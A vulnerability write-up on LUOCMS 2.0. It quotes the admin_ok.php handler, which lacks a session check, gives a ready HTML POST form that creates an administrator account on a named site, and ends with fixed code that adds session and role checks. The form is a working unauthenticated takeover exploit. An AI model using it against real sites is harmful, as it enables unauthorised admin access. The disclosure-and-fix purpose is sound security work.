LUOCMS 2.0 add-administrator vulnerability and its fix (with POST exploit)

Source: Internet
Author: User

LUOCMS is an article management system based on PHP + MySQL. It is simple and easy to use, adopts a DIV + CSS layout with a fully static HTML site, and has a clean internal structure that suits website optimization and promotion.

The developer's reasoning seems to be that since this file renders nothing, a user cannot simply open and view it, so it performs no session check...
Look at the code anyway:
admin/manager/admin_ok.php

```php
<?php
require_once '../../inc/const.php';
// The check that $_SESSION['username'] exists, present in the other files, is missing here ......
$act = trim($_GET['act']);   // not sanitized
$id  = getvar('id');          // getvar() applies addslashes() to this value
// Add data
if ($act == 'add') {
    if (check_username($_POST['username'])) {
        // reject a duplicate administrator name
        exit("<script>alert('User " . $_POST['username'] . " already exists!');window.history.go(-1)</script>");
    }

    $record = array(
        'username'     => $_POST['username'],
        'password'     => md5($_POST['password']),
        'addtime'      => date("Y-m-d H:i:s"),
        'supermanager' => $_SESSION['supermanager'] + 1
    ); // supermanager is not sanitized either, but that does not matter here
    $id = $db->insert($GLOBALS['databasePrefix'] . 'manager', $record); // writes straight to the database
    echo "<script>alert('Added successfully!');window.location='admin_manage.php';</script>";
}
// The remaining code (modify and delete) is omitted.
```

POST EXP

```html
<form method="post" action="http://www.hackqing.com/admin/manager/admin_ok.php?act=add" enctype="multipart/form-data" id="upload">
<label>
<input name="username" type="text" value="qing"/>
</label>
<label>
<input name="password" type="text" value="qing520"/>
</label>
<div></div>
<input name="respondids" value="confirm to modify" class="coolbg np" type="submit">
</form>
```

Adding administrators is not the only case: database backup and adding news are handled the same way, with no verification, on the assumption that users never see those files...

Program:
Local download: http://www.luocms.com/down/luocms_V1.100606_UTF8.rar

Download from Red/Black Alliance: http://www.bkjia.com/ym/201011/24742.html

Author: Mind, edited by emotion

Fix: add strict session verification to the handler, as the other admin files already do.
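As an added illustration of that fix (example code, not LUOCMS's own), the same handler with the missing session check placed before anything else. It assumes the admin login stores the operator's name in $_SESSION['username'] and a non-empty $_SESSION['supermanager'] for super administrators, as the comments in admin_ok.php imply; check_username(), getvar() and $db come from const.php as on the page.

```php
<?php
// Added example of the fix, not LUOCMS's own code.
require_once '../../inc/const.php';
// Assumption: const.php may already have started the session; avoid a second start.
if (session_status() !== PHP_SESSION_ACTIVE) {
    session_start();
}

// Strict verification before any action is dispatched. A handler that renders
// no page still needs it, because it can be POSTed to directly.
if (empty($_SESSION['username'])) {
    header('HTTP/1.1 403 Forbidden');
    exit('Login required');
}
// Least privilege: only a super administrator may create administrators
// (assumes a non-empty 'supermanager' session value marks that role).
if (empty($_SESSION['supermanager'])) {
    header('HTTP/1.1 403 Forbidden');
    exit('Permission denied');
}

$act = isset($_GET['act']) ? trim($_GET['act']) : '';

if ($act === 'add') {
    $username = isset($_POST['username']) ? trim($_POST['username']) : '';
    $password = isset($_POST['password']) ? $_POST['password'] : '';

    // Validate input on the way in instead of relying on addslashes() downstream.
    if (!preg_match('/^[A-Za-z0-9_]{3,20}$/', $username) || strlen($password) < 8) {
        exit('Invalid username or password');
    }
    if (check_username($username)) {
        exit('User ' . htmlspecialchars($username, ENT_QUOTES, 'UTF-8') . ' already exists');
    }

    $record = array(
        'username'     => $username,
        // md5() is kept only because the login code compares against it;
        // switching to password_hash() requires changing the login check too.
        'password'     => md5($password),
        'addtime'      => date('Y-m-d H:i:s'),
        'supermanager' => (int) $_SESSION['supermanager'] + 1,
    );
    $db->insert($GLOBALS['databasePrefix'] . 'manager', $record);
    echo 'Added successfully';
}
```

The same guard belongs at the top of the backup and news handlers the post mentions, since they share the flaw.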
